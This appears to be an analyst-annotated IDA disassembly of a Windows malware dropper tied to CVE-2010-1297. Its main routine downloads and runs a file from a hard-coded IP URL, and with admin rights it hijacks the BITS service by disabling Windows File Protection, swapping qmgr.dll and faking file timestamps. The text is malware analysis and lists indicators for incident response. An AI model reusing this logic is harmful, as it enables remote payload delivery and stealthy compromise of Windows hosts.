.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file has been generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2009 by Hex-Rays, |
.text:00401000 ; | License info: 48-353D-70D4-28 |
.text:00401000 ; | Frank Boldewin, GAD eG |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5 : C679D3631D19BD527FBF6D5FD9BD0AC5
.text:00401000
.text:00401000 ; File Name : Y:\malware-archiv\cve-2010-1297\dropped-file\downloader.exe
.text:00401000 ; Format : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00000952 ( 2386.)
.text:00401000 ; Section size in file : 00000A00 ( 2560.)
.text:00401000 ; Offset to raw data for section: 00000400
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : default
.text:00401000 ; OS type : MS Windows
.text:00401000 ; Application type: Executable 32bit
.text:00401000
.text:00401000 .686p
.text:00401000 .mmx
.text:00401000 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000
.text:00401000 ; =============== S U B R O U T I N E =======================================
.text:00401000
.text:00401000
.text:00401000 ; Reviewer notes (analyst annotation, not original IDA output):
.text:00401000 ;  WinMain as visible in this listing:
.text:00401000 ;   1. Builds path strings under the system directory (dllcache\qmgr.dll, qmgr.dll,
.text:00401000 ;      kernel64.dll, es.ini) and the Windows directory (EventSystem.dll,
.text:00401000 ;      ServicePackFiles\i386\qmgr.dll) with sprintf into 104h-byte stack buffers.
.text:00401000 ;   2. Calls CheckIfLocalAccountIsAdmin (004013E0).
.text:00401000 ;      Non-admin: URLDownloadToFileA of the hard-coded URL to %TEMP%\1yxf.exe, then WinExec.
.text:00401000 ;      Admin: unless %WINDIR%\EventSystem.dll already exists, writes resources SERV_DLL
.text:00401000 ;      (id 65h) and SERV_INI (id 66h) to disk, sets the "BITS" service to disabled, stops it,
.text:00401000 ;      calls DisableWindowsFileProtection on <sysdir>\qmgr.dll, calls
.text:00401000 ;      ReplaceOriginalQMGR_DLLwithEventSystem_DLL (body not in this listing), copies file
.text:00401000 ;      times onto the written files, sets BITS back to auto-start and starts it.
.text:00401000 ;   3. Returns 0 at ExecutionWasOk, -1 at SomethingFailed and when the marker file exists.
.text:00401000 ;  Error handling is partial: WriteFile/CreateFileA/LoadResource results are not checked,
.text:00401000 ;  StopBITS's return is ignored, and ManipulateBITSService never returns the -1 that the
.text:00401000 ;  `cmp eax, 0FFFFFFFFh` checks below test for (see its header at 004015A0).
.text:00401000 ;  Host/network indicators grounded in this listing: the MD5 and URL above,
.text:00401000 ;  %WINDIR%\EventSystem.dll, <sysdir>\es.ini, %TEMP%\1yxf.exe, a ChangeServiceConfigA on
.text:00401000 ;  "BITS", and LoadLibraryA("sfc_os.dll") followed by GetProcAddress by ordinal 5.
.text:00401000
.text:00401000 ; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:00401000 _WinMain@16 proc near ; CODE XREF: start+12Fp
.text:00401000
.text:00401000 NumberOfBytesWritten= dword ptr -0C68h
.text:00401000 hResData = dword ptr -0C64h
.text:00401000 ServiceName = byte ptr -0C60h ; 100h-byte buffer, filled with "BITS" below
.text:00401000 var_C5C = byte ptr -0C5Ch
.text:00401000 var_C5B = byte ptr -0C5Bh
.text:00401000 Buffer = byte ptr -0B60h ; GetSystemDirectoryA output
.text:00401000 var_A5C = dword ptr -0A5Ch ; "<sysdir>\kernel64.dll"
.text:00401000 ExistingFileName= byte ptr -958h ; "<windir>\EventSystem.dll"
.text:00401000 MultiByteStr = byte ptr -854h ; "<sysdir>\qmgr.dll"
.text:00401000 var_750 = byte ptr -750h ; 100h-byte URL buffer
.text:00401000 var_70F = byte ptr -70Fh
.text:00401000 var_650 = byte ptr -650h ; GetWindowsDirectoryA output
.text:00401000 var_54C = dword ptr -54Ch ; "<sysdir>\es.ini"
.text:00401000 CmdLine = byte ptr -448h ; "%TEMP%\1yxf.exe"
.text:00401000 FindFileData = _WIN32_FIND_DATAA ptr -348h ; also reused as the %TEMP% string buffer
.text:00401000 FileName = byte ptr -208h ; "<windir>\ServicePackFiles\i386\qmgr.dll"
.text:00401000 NewFileName = byte ptr -104h ; "<sysdir>\dllcache\qmgr.dll"
.text:00401000 hInstance = dword ptr 4
.text:00401000 hPrevInstance = dword ptr 8
.text:00401000 lpCmdLine = dword ptr 0Ch
.text:00401000 nShowCmd = dword ptr 10h
.text:00401000
.text:00401000 81 EC 68 0C 00 00 sub esp, 0C68h
.text:00401006 A1 F8 30 40 00 mov eax, dword ptr aBITS ; "BITS"
.text:0040100B 8A 0D FC 30 40 00 mov cl, byte ptr aBITS+4 ; byte after "BITS" (its terminator)
.text:00401011 56 push esi
.text:00401012 57 push edi
.text:00401013 89 44 24 10 mov dword ptr [esp+0C70h+ServiceName], eax ; ServiceName = "BITS"
.text:00401017 88 4C 24 14 mov [esp+0C70h+var_C5C], cl
.text:0040101B B9 3E 00 00 00 mov ecx, 3Eh
.text:00401020 33 C0 xor eax, eax
.text:00401022 8D 7C 24 15 lea edi, [esp+0C70h+var_C5B]
.text:00401026 8D 94 24 10 01 00 00 lea edx, [esp+0C70h+Buffer]
.text:0040102D F3 AB rep stosd ; zero the remaining 3Eh*4+2+1 = 251 bytes of ServiceName
.text:0040102F 66 AB stosw
.text:00401031 68 04 01 00 00 push 104h ; uSize
.text:00401036 52 push edx ; lpBuffer
.text:00401037 AA stosb
.text:00401038 FF 15 3C 20 40 00 call ds:GetSystemDirectoryA
.text:0040103E 85 C0 test eax, eax
.text:00401040 0F 84 82 01 00 00 jz SomethingFailed
.text:00401046 8D 84 24 10 01 00 00 lea eax, [esp+0C70h+Buffer]
.text:0040104D 8D 8C 24 6C 0B 00 00 lea ecx, [esp+0C70h+NewFileName]
.text:00401054 50 push eax
.text:00401055 68 E0 30 40 00 push offset Format ; "%s\\dllcache\\qmgr.dll"
.text:0040105A 51 push ecx ; Dest
.text:0040105B E8 50 07 00 00 call sprintf ; unbounded sprintf; the %s input is capped at 104h by GetSystemDirectoryA
.text:00401060 83 C4 0C add esp, 0Ch
.text:00401063 8D 94 24 10 01 00 00 lea edx, [esp+0C70h+Buffer]
.text:0040106A 8D 84 24 1C 04 00 00 lea eax, [esp+0C70h+MultiByteStr]
.text:00401071 52 push edx
.text:00401072 68 D4 30 40 00 push offset aSQmgr_dll ; "%s\\qmgr.dll"
.text:00401077 50 push eax ; Dest
.text:00401078 E8 33 07 00 00 call sprintf
.text:0040107D 83 C4 0C add esp, 0Ch
.text:00401080 8D 8C 24 10 01 00 00 lea ecx, [esp+0C70h+Buffer]
.text:00401087 8D 94 24 14 02 00 00 lea edx, [esp+0C70h+var_A5C]
.text:0040108E 51 push ecx
.text:0040108F 68 C4 30 40 00 push offset aSKernel64_dll ; "%s\\kernel64.dll"
.text:00401094 52 push edx ; Dest
.text:00401095 E8 16 07 00 00 call sprintf
.text:0040109A 83 C4 0C add esp, 0Ch
.text:0040109D 8D 84 24 10 01 00 00 lea eax, [esp+0C70h+Buffer]
.text:004010A4 8D 8C 24 24 07 00 00 lea ecx, [esp+0C70h+var_54C]
.text:004010AB 50 push eax
.text:004010AC 68 B8 30 40 00 push offset aSEs_ini ; "%s\\es.ini"
.text:004010B1 51 push ecx ; Dest
.text:004010B2 E8 F9 06 00 00 call sprintf
.text:004010B7 83 C4 0C add esp, 0Ch
.text:004010BA 8D 94 24 20 06 00 00 lea edx, [esp+0C70h+var_650]
.text:004010C1 68 04 01 00 00 push 104h ; uSize
.text:004010C6 52 push edx ; lpBuffer
.text:004010C7 FF 15 48 20 40 00 call ds:GetWindowsDirectoryA
.text:004010CD 85 C0 test eax, eax
.text:004010CF 0F 84 F3 00 00 00 jz SomethingFailed
.text:004010D5 8D 84 24 20 06 00 00 lea eax, [esp+0C70h+var_650]
.text:004010DC 8D 8C 24 18 03 00 00 lea ecx, [esp+0C70h+ExistingFileName]
.text:004010E3 50 push eax
.text:004010E4 68 A4 30 40 00 push offset aSEventsystem_d ; "%s\\EventSystem.dll"
.text:004010E9 51 push ecx ; Dest
.text:004010EA E8 C1 06 00 00 call sprintf
.text:004010EF 83 C4 0C add esp, 0Ch
.text:004010F2 8D 94 24 20 06 00 00 lea edx, [esp+0C70h+var_650]
.text:004010F9 8D 84 24 68 0A 00 00 lea eax, [esp+0C70h+FileName]
.text:00401100 52 push edx
.text:00401101 68 80 30 40 00 push offset aSServicepackfi ; "%s\\ServicePackFiles\\i386\\qmgr.dll"
.text:00401106 50 push eax ; Dest
.text:00401107 E8 A4 06 00 00 call sprintf
.text:0040110C 83 C4 0C add esp, 0Ch
.text:0040110F E8 CC 02 00 00 call CheckIfLocalAccountIsAdmin ; nonzero = BUILTIN\Administrators member (or import unresolvable, see 004013E0)
.text:00401114 85 C0 test eax, eax
.text:00401116 0F 85 BA 00 00 00 jnz AccountWasPrivileged ; admin -> service-hijack path; otherwise download-and-execute path
.text:0040111C 50 push eax ; pvReserved (eax == 0 here)
.text:0040111D FF 15 D0 20 40 00 call ds:CoInitialize ; HRESULT ignored
.text:00401123 B9 10 00 00 00 mov ecx, 10h
.text:00401128 BE 3C 30 40 00 mov esi, offset aHttp210_211_31 ; "http://210.211.31.214/img/xslu.exe"
.text:0040112D 8D BC 24 20 05 00 00 lea edi, [esp+0C70h+var_750]
.text:00401134 33 C0 xor eax, eax
.text:00401136 F3 A5 rep movsd ; copies 10h dwords + 1 byte = 65 bytes starting at the URL string into var_750;
.text:00401138 A4 movsb ; the URL is 34 chars + NUL, so the tail comes from whatever follows it in .data (not shown)
.text:00401139 B9 2F 00 00 00 mov ecx, 2Fh
.text:0040113E 8D BC 24 61 05 00 00 lea edi, [esp+0C70h+var_70F]
.text:00401145 F3 AB rep stosd ; zero the remaining 2Fh*4+2+1 = 191 bytes of the 100h-byte URL buffer
.text:00401147 66 AB stosw
.text:00401149 8D 8C 24 28 09 00 00 lea ecx, [esp+0C70h+FindFileData]
.text:00401150 68 00 01 00 00 push 100h ; nSize
.text:00401155 51 push ecx ; lpBuffer (the FindFileData slot reused as a string buffer)
.text:00401156 68 34 30 40 00 push offset Name ; "TEMP"
.text:0040115B AA stosb
.text:0040115C FF 15 4C 20 40 00 call ds:GetEnvironmentVariableA
.text:00401162 85 C0 test eax, eax
.text:00401164 74 62 jz short SomethingFailed
.text:00401166 8D 94 24 28 09 00 00 lea edx, [esp+0C70h+FindFileData]
.text:0040116D 8D 84 24 28 08 00 00 lea eax, [esp+0C70h+CmdLine]
.text:00401174 52 push edx
.text:00401175 68 28 30 40 00 push offset aS1yxf_exe ; "%s\\1yxf.exe"
.text:0040117A 50 push eax ; Dest
.text:0040117B E8 30 06 00 00 call sprintf ; CmdLine = "%TEMP%\1yxf.exe"
.text:00401180 83 C4 0C add esp, 0Ch
.text:00401183 8D 8C 24 20 05 00 00 lea ecx, [esp+0C70h+var_750]
.text:0040118A 51 push ecx
.text:0040118B FF 15 C8 20 40 00 call ds:DeleteUrlCacheEntry ; drop any cached copy of the URL so the download below is fetched fresh
.text:00401191 6A 00 push 0 ; LPBINDSTATUSCALLBACK
.text:00401193 8D 94 24 2C 08 00 00 lea edx, [esp+0C74h+CmdLine]
.text:0040119A 6A 00 push 0 ; DWORD
.text:0040119C 8D 84 24 28 05 00 00 lea eax, [esp+0C78h+var_750]
.text:004011A3 52 push edx ; LPCSTR (szFileName = CmdLine)
.text:004011A4 50 push eax ; LPCSTR (szURL = var_750)
.text:004011A5 6A 00 push 0 ; LPUNKNOWN
.text:004011A7 E8 A0 07 00 00 call URLDownloadToFileA ; Download file and store it into
.text:004011A7 ; windows temp dir as 1yxf.exe
.text:004011A7 ;
.text:004011AC 85 C0 test eax, eax ; S_OK (0) is the only accepted result
.text:004011AE 75 18 jnz short SomethingFailed
.text:004011B0 8D 8C 24 28 08 00 00 lea ecx, [esp+0C70h+CmdLine]
.text:004011B7 50 push eax ; uCmdShow (eax == 0 here, i.e. SW_HIDE)
.text:004011B8 51 push ecx ; lpCmdLine
.text:004011B9 FF 15 50 20 40 00 call ds:WinExec ; ...and Execute it
.text:004011BF 83 F8 1F cmp eax, 1Fh ; WinExec: values > 31 mean success
.text:004011C2 0F 87 01 02 00 00 ja ExecutionWasOk
.text:004011C8
.text:004011C8 SomethingFailed: ; CODE XREF: WinMain(x,x,x,x)+40j
.text:004011C8 ; WinMain(x,x,x,x)+CFj ...
.text:004011C8 ; common failure exit: returns -1
.text:004011C8 5F pop edi
.text:004011C9 83 C8 FF or eax, 0FFFFFFFFh
.text:004011CC 5E pop esi
.text:004011CD 81 C4 68 0C 00 00 add esp, 0C68h
.text:004011D3 C2 10 00 retn 10h
.text:004011D6 ; ---------------------------------------------------------------------------
.text:004011D6
.text:004011D6 AccountWasPrivileged: ; CODE XREF: WinMain(x,x,x,x)+116j
.text:004011D6 ; marker check: if <windir>\EventSystem.dll already exists, bail out with -1.
.text:004011D6 ; IR note: presence of that file is therefore a reliable host artefact of this sample.
.text:004011D6 8D 94 24 28 09 00 00 lea edx, [esp+0C70h+FindFileData]
.text:004011DD 8D 84 24 18 03 00 00 lea eax, [esp+0C70h+ExistingFileName]
.text:004011E4 52 push edx ; lpFindFileData
.text:004011E5 50 push eax ; c:\windows\EventSystem.dll
.text:004011E6 FF 15 54 20 40 00 call ds:FindFirstFileA
.text:004011EC 83 F8 FF cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE -> not present
.text:004011EF 74 15 jz short EventSystem_DLLnotfound
.text:004011F1 50 push eax ; hFindFile
.text:004011F2 FF 15 58 20 40 00 call ds:FindClose
.text:004011F8 5F pop edi
.text:004011F9 83 C8 FF or eax, 0FFFFFFFFh ; already installed -> return -1
.text:004011FC 5E pop esi
.text:004011FD 81 C4 68 0C 00 00 add esp, 0C68h
.text:00401203 C2 10 00 retn 10h
.text:00401206 ; ---------------------------------------------------------------------------
.text:00401206
.text:00401206 EventSystem_DLLnotfound: ; CODE XREF: WinMain(x,x,x,x)+1EFj
.text:00401206 ; resource drop #1: RT "SERV_DLL", id 65h -> <windir>\EventSystem.dll.
.text:00401206 ; None of FindResourceA / LoadResource / CreateFileA / WriteFile results are checked.
.text:00401206 8B 3D 5C 20 40 00 mov edi, ds:FindResourceA
.text:0040120C 53 push ebx
.text:0040120D 55 push ebp
.text:0040120E 68 1C 30 40 00 push offset Type ; "SERV_DLL"
.text:00401213 6A 65 push 65h ; lpName
.text:00401215 6A 00 push 0 ; hModule
.text:00401217 C7 44 24 1C 00 00 00 00 mov [esp+0C84h+NumberOfBytesWritten], 0
.text:0040121F FF D7 call edi ; FindResourceA
.text:00401221 8B 1D 60 20 40 00 mov ebx, ds:SizeofResource
.text:00401227 8B F0 mov esi, eax
.text:00401229 56 push esi ; hResInfo
.text:0040122A 6A 00 push 0 ; hModule
.text:0040122C FF D3 call ebx ; SizeofResource
.text:0040122E 56 push esi ; hResInfo
.text:0040122F 6A 00 push 0 ; hModule
.text:00401231 8B E8 mov ebp, eax ; ebp = resource size (bytes to write)
.text:00401233 FF 15 64 20 40 00 call ds:LoadResource
.text:00401239 6A 00 push 0 ; hTemplateFile
.text:0040123B 68 A0 00 00 00 push 0A0h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_NORMAL
.text:00401240 6A 02 push 2 ; dwCreationDisposition = CREATE_ALWAYS (overwrites)
.text:00401242 6A 00 push 0 ; lpSecurityAttributes
.text:00401244 6A 07 push 7 ; dwShareMode = READ | WRITE | DELETE
.text:00401246 8D 8C 24 34 03 00 00 lea ecx, [esp+0C8Ch+ExistingFileName]
.text:0040124D 68 FF 03 1F 00 push 1F03FFh ; dwDesiredAccess
.text:00401252 51 push ecx ; lpFileName
.text:00401253 89 44 24 30 mov [esp+0C94h+hResData], eax
.text:00401257 FF 15 6C 20 40 00 call ds:CreateFileA ; Drop c:\windows\EventSystem.dll
.text:0040125D 8D 54 24 10 lea edx, [esp+0C78h+NumberOfBytesWritten]
.text:00401261 8B F0 mov esi, eax ; esi = hFile (not checked against INVALID_HANDLE_VALUE)
.text:00401263 8B 44 24 14 mov eax, [esp+0C78h+hResData]
.text:00401267 6A 00 push 0 ; lpOverlapped
.text:00401269 52 push edx ; lpNumberOfBytesWritten
.text:0040126A 55 push ebp ; nNumberOfBytesToWrite
.text:0040126B 8B 2D 70 20 40 00 mov ebp, ds:LockResource
.text:00401271 50 push eax ; hResData
.text:00401272 FF D5 call ebp ; LockResource
.text:00401274 50 push eax ; lpBuffer
.text:00401275 56 push esi ; hFile
.text:00401276 FF 15 74 20 40 00 call ds:WriteFile ; BOOL and NumberOfBytesWritten are never inspected
.text:0040127C 56 push esi ; hObject
.text:0040127D FF 15 78 20 40 00 call ds:CloseHandle
.text:00401283 ; resource drop #2: RT "SERV_INI", id 66h -> <sysdir>\es.ini (same unchecked pattern)
.text:00401283 68 10 30 40 00 push offset aServ_ini ; "SERV_INI"
.text:00401288 6A 66 push 66h ; lpName
.text:0040128A 6A 00 push 0 ; hModule
.text:0040128C FF D7 call edi ; FindResourceA
.text:0040128E 8B F0 mov esi, eax
.text:00401290 56 push esi ; hResInfo
.text:00401291 6A 00 push 0 ; hModule
.text:00401293 FF D3 call ebx ; SizeofResource
.text:00401295 56 push esi ; hResInfo
.text:00401296 6A 00 push 0 ; hModule
.text:00401298 8B F8 mov edi, eax ; edi = resource size
.text:0040129A FF 15 64 20 40 00 call ds:LoadResource
.text:004012A0 6A 00 push 0 ; hTemplateFile
.text:004012A2 68 A0 00 00 00 push 0A0h ; dwFlagsAndAttributes
.text:004012A7 6A 02 push 2 ; dwCreationDisposition = CREATE_ALWAYS
.text:004012A9 6A 00 push 0 ; lpSecurityAttributes
.text:004012AB 6A 07 push 7 ; dwShareMode
.text:004012AD 8D 8C 24 40 07 00 00 lea ecx, [esp+0C8Ch+var_54C]
.text:004012B4 68 FF 03 1F 00 push 1F03FFh ; dwDesiredAccess
.text:004012B9 51 push ecx ; lpFileName
.text:004012BA 8B D8 mov ebx, eax ; ebx = hResData
.text:004012BC FF 15 6C 20 40 00 call ds:CreateFileA ; Drop c:\windows\system32\es.ini
.text:004012C2 8D 54 24 10 lea edx, [esp+0C78h+NumberOfBytesWritten]
.text:004012C6 6A 00 push 0 ; lpOverlapped
.text:004012C8 52 push edx ; lpNumberOfBytesWritten
.text:004012C9 57 push edi ; nNumberOfBytesToWrite
.text:004012CA 53 push ebx ; hResData
.text:004012CB 8B F0 mov esi, eax
.text:004012CD FF D5 call ebp ; LockResource
.text:004012CF 50 push eax ; lpBuffer
.text:004012D0 56 push esi ; hFile
.text:004012D1 FF 15 74 20 40 00 call ds:WriteFile
.text:004012D7 56 push esi ; hObject
.text:004012D8 FF 15 78 20 40 00 call ds:CloseHandle
.text:004012DE ; service tampering: disable BITS, stop it, then swap its DLL
.text:004012DE 8D 44 24 18 lea eax, [esp+0C78h+ServiceName]
.text:004012E2 6A 04 push 4 ; dwStartType = DEACTIVATE (4 == SERVICE_DISABLED)
.text:004012E4 50 push eax ; lpServiceName
.text:004012E5 E8 B6 02 00 00 call ManipulateBITSService
.text:004012EA 83 C4 08 add esp, 8
.text:004012ED 5D pop ebp
.text:004012EE 83 F8 FF cmp eax, 0FFFFFFFFh ; NB: ManipulateBITSService returns 0 or a BOOL, never -1 (see 004015A0)
.text:004012F1 5B pop ebx
.text:004012F2 0F 84 D0 FE FF FF jz SomethingFailed
.text:004012F8 8D 4C 24 10 lea ecx, [esp+0C70h+ServiceName]
.text:004012FC 51 push ecx ; lpServiceName
.text:004012FD E8 2E 03 00 00 call StopBITS ; return value is not checked
.text:00401302 8B 35 68 20 40 00 mov esi, ds:Sleep
.text:00401308 83 C4 04 add esp, 4
.text:0040130B 6A 01 push 1 ; dwMilliseconds
.text:0040130D FF D6 call esi ; Sleep
.text:0040130F 8D 94 24 1C 04 00 00 lea edx, [esp+0C70h+MultiByteStr]
.text:00401316 52 push edx ; lpMultiByteStr = "<sysdir>\qmgr.dll"
.text:00401317 E8 64 01 00 00 call DisableWindowsFileProtection ; sfc_os.dll ordinal 5 on qmgr.dll (see 00401480)
.text:0040131C 83 C4 04 add esp, 4
.text:0040131F 6A 01 push 1 ; dwMilliseconds
.text:00401321 FF D6 call esi ; Sleep
.text:00401323 ; 5 cdecl args, last pushed = first: (dllcache\qmgr.dll, kernel64.dll, <sysdir>\qmgr.dll,
.text:00401323 ; EventSystem.dll, ServicePackFiles\i386\qmgr.dll). The callee body is not in this listing.
.text:00401323 8D 84 24 68 0A 00 00 lea eax, [esp+0C70h+FileName]
.text:0040132A 8D 8C 24 18 03 00 00 lea ecx, [esp+0C70h+ExistingFileName]
.text:00401331 50 push eax ; lpFileName
.text:00401332 8D 94 24 20 04 00 00 lea edx, [esp+0C74h+MultiByteStr]
.text:00401339 51 push ecx ; lpExistingFileName
.text:0040133A 8D 84 24 1C 02 00 00 lea eax, [esp+0C78h+var_A5C]
.text:00401341 52 push edx ; int
.text:00401342 8D 8C 24 78 0B 00 00 lea ecx, [esp+0C7Ch+NewFileName]
.text:00401349 50 push eax ; int
.text:0040134A 51 push ecx ; lpNewFileName
.text:0040134B E8 B0 03 00 00 call ReplaceOriginalQMGR_DLLwithEventSystem_DLL
.text:00401350 83 C4 14 add esp, 14h
.text:00401353 83 F8 FF cmp eax, 0FFFFFFFFh
.text:00401356 0F 84 6C FE FF FF jz SomethingFailed
.text:0040135C ; three timestamp copies. SetFakeQMGRToOriginalQMGRFiletime(arg_0 = target, lpFileName = source):
.text:0040135C ; the source (2nd arg, pushed first) is var_A5C = "<sysdir>\kernel64.dll" each time.
.text:0040135C ; IDA's original push comments named the target here; corrected below.
.text:0040135C 8D 94 24 14 02 00 00 lea edx, [esp+0C70h+var_A5C]
.text:00401363 8D 84 24 18 03 00 00 lea eax, [esp+0C70h+ExistingFileName]
.text:0040136A 52 push edx ; source: <sysdir>\kernel64.dll (var_A5C)
.text:0040136B 50 push eax ; target: c:\windows\EventSystem.dll
.text:0040136C E8 7F 01 00 00 call SetFakeQMGRToOriginalQMGRFiletime ; return value not checked
.text:00401371 8D 8C 24 1C 02 00 00 lea ecx, [esp+0C78h+var_A5C]
.text:00401378 8D 94 24 24 04 00 00 lea edx, [esp+0C78h+MultiByteStr]
.text:0040137F 51 push ecx ; source: <sysdir>\kernel64.dll (var_A5C)
.text:00401380 52 push edx ; target: c:\windows\system32\qmgr.dll
.text:00401381 E8 6A 01 00 00 call SetFakeQMGRToOriginalQMGRFiletime
.text:00401386 8D 84 24 24 02 00 00 lea eax, [esp+0C80h+var_A5C]
.text:0040138D 8D 8C 24 34 07 00 00 lea ecx, [esp+0C80h+var_54C]
.text:00401394 50 push eax ; source: <sysdir>\kernel64.dll (var_A5C)
.text:00401395 51 push ecx ; target: es.ini
.text:00401396 E8 55 01 00 00 call SetFakeQMGRToOriginalQMGRFiletime
.text:0040139B 8D 54 24 28 lea edx, [esp+0C88h+ServiceName]
.text:0040139F 6A 02 push 2 ; dwStartType = Automatic (2 == SERVICE_AUTO_START)
.text:004013A1 52 push edx ; lpServiceName
.text:004013A2 E8 F9 01 00 00 call ManipulateBITSService
.text:004013A7 83 C4 20 add esp, 20h ; deferred cdecl cleanup for the 3 + 1 calls above (3*8 + 8 bytes)
.text:004013AA 83 F8 FF cmp eax, 0FFFFFFFFh ; same ineffective -1 check as at 004012EE
.text:004013AD 0F 84 15 FE FF FF jz SomethingFailed
.text:004013B3 8D 44 24 10 lea eax, [esp+0C70h+ServiceName]
.text:004013B7 50 push eax ; lpServiceName
.text:004013B8 E8 E3 02 00 00 call StartBITS
.text:004013BD 83 C4 04 add esp, 4
.text:004013C0 83 F8 FF cmp eax, 0FFFFFFFFh
.text:004013C3 0F 84 FF FD FF FF jz SomethingFailed
.text:004013C9
.text:004013C9 ExecutionWasOk: ; CODE XREF: WinMain(x,x,x,x)+1C2j
.text:004013C9 ; success exit: returns 0
.text:004013C9 5F pop edi
.text:004013CA 33 C0 xor eax, eax
.text:004013CC 5E pop esi
.text:004013CD 81 C4 68 0C 00 00 add esp, 0C68h
.text:004013D3 C2 10 00 retn 10h
.text:004013D3 _WinMain@16 endp
.text:004013D3
.text:004013D3 ; ---------------------------------------------------------------------------
.text:004013D6 90 90 90 90 90 90 90 90+ align 10h
.text:004013E0
.text:004013E0 ; =============== S U B R O U T I N E =======================================
.text:004013E0
.text:004013E0
.text:004013E0 ; Reviewer note: builds SID S-1-5-32-544 (SECURITY_NT_AUTHORITY; sub-authorities 20h =
.text:004013E0 ; SECURITY_BUILTIN_DOMAIN_RID, 220h = DOMAIN_ALIAS_RID_ADMINS) and asks CheckTokenMembership
.text:004013E0 ; whether the caller's token (TokenHandle = NULL) holds it. Returns nonzero for admin. It ALSO
.text:004013E0 ; returns 1 when GetProcAddress("CheckTokenMembership") yields NULL (0040141E), so an
.text:004013E0 ; unresolvable import is treated as "privileged". LoadLibraryA's result is never checked and the
.text:004013E0 ; module is never freed.
.text:004013E0 CheckIfLocalAccountIsAdmin proc near ; CODE XREF: WinMain(x,x,x,x)+10Fp
.text:004013E0
.text:004013E0 var_10 = dword ptr -10h ; AllocateAndInitializeSid BOOL, then reused as IsMember out-param / return value
.text:004013E0 pSid = dword ptr -0Ch
.text:004013E0 pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -8
.text:004013E0
.text:004013E0 83 EC 10 sub esp, 10h
.text:004013E3 53 push ebx
.text:004013E4 56 push esi
.text:004013E5 33 DB xor ebx, ebx ; ebx = 0 for the rest of the function
.text:004013E7 68 10 31 40 00 push offset ProcName ; "CheckTokenMembership"
.text:004013EC 68 00 31 40 00 push offset LibFileName ; "Advapi32.dll"
.text:004013F1 88 5C 24 18 mov [esp+20h+pIdentifierAuthority.Value], bl ; Value = {0,0,0,0,0,5}
.text:004013F5 88 5C 24
19 mov [esp+20h+pIdentifierAuthority.Value+1], bl
.text:004013F9 88 5C 24 1A mov [esp+20h+pIdentifierAuthority.Value+2], bl
.text:004013FD 88 5C 24 1B mov [esp+20h+pIdentifierAuthority.Value+3], bl
.text:00401401 88 5C 24 1C mov [esp+20h+pIdentifierAuthority.Value+4], bl
.text:00401405 C6 44 24 1D 05 mov [esp+20h+pIdentifierAuthority.Value+5], 5 ; SECURITY_NT_AUTHORITY
.text:0040140A FF 15 30 20 40 00 call ds:LoadLibraryA ; hModule not checked for NULL
.text:00401410 50 push eax ; hModule
.text:00401411 FF 15 2C 20 40 00 call ds:GetProcAddress
.text:00401417 8B F0 mov esi, eax ; esi = CheckTokenMembership or NULL
.text:00401419 3B F3 cmp esi, ebx
.text:0040141B 75 0B jnz short loc_401428
.text:0040141D 5E pop esi
.text:0040141E B8 01 00 00 00 mov eax, 1 ; import unresolvable -> report "is admin"
.text:00401423 5B pop ebx
.text:00401424 83 C4 10 add esp, 10h
.text:00401427 C3 retn
.text:00401428 ; ---------------------------------------------------------------------------
.text:00401428
.text:00401428 loc_401428: ; CODE XREF: CheckIfLocalAccountIsAdmin+3Bj
.text:00401428 ; AllocateAndInitializeSid(&auth, 2, 20h, 220h, 0,0,0,0,0,0, &pSid) -> S-1-5-32-544
.text:00401428 8D 44 24 0C lea eax, [esp+18h+pSid]
.text:0040142C 8D 4C 24 10 lea ecx, [esp+18h+pIdentifierAuthority]
.text:00401430 50 push eax ; pSid
.text:00401431 53 push ebx ; nSubAuthority7
.text:00401432 53 push ebx ; nSubAuthority6
.text:00401433 53 push ebx ; nSubAuthority5
.text:00401434 53 push ebx ; nSubAuthority4
.text:00401435 53 push ebx ; nSubAuthority3
.text:00401436 53 push ebx ; nSubAuthority2
.text:00401437 68 20 02 00 00 push 220h ; nSubAuthority1 (DOMAIN_ALIAS_RID_ADMINS)
.text:0040143C 6A 20 push 20h ; nSubAuthority0 (SECURITY_BUILTIN_DOMAIN_RID)
.text:0040143E 6A 02 push 2 ; nSubAuthorityCount
.text:00401440 51 push ecx ; pIdentifierAuthority
.text:00401441 FF 15 20 20 40 00 call ds:AllocateAndInitializeSid
.text:00401447 3B C3 cmp eax, ebx
.text:00401449 89 44 24 08 mov [esp+18h+var_10], eax
.text:0040144D 74 24 jz short loc_401473 ; SID allocation failed -> return 0 (eax)
.text:0040144F 8B 44 24 0C mov eax, [esp+18h+pSid]
.text:00401453 8D 54 24 08 lea edx, [esp+18h+var_10]
.text:00401457 52 push edx ; IsMember (out)
.text:00401458 50 push eax ; SidToCheck
.text:00401459 53 push ebx ; TokenHandle = NULL (current thread/process token)
.text:0040145A FF D6 call esi ; CheckTokenMembership
.text:0040145C 85 C0 test eax, eax
.text:0040145E 75 04 jnz short loc_401464
.text:00401460 89 5C 24 08 mov [esp+18h+var_10], ebx ; call failed -> result 0
.text:00401464
.text:00401464 loc_401464: ; CODE XREF: CheckIfLocalAccountIsAdmin+7Ej
.text:00401464 8B 4C 24 0C mov ecx, [esp+18h+pSid]
.text:00401468 51 push ecx ; pSid
.text:00401469 FF 15 24 20 40 00 call ds:FreeSid
.text:0040146F 8B 44 24 08 mov eax, [esp+18h+var_10] ; eax = IsMember
.text:00401473
.text:00401473 loc_401473: ; CODE XREF: CheckIfLocalAccountIsAdmin+6Dj
.text:00401473 5E pop esi
.text:00401474 5B pop ebx
.text:00401475 83 C4 10 add esp, 10h
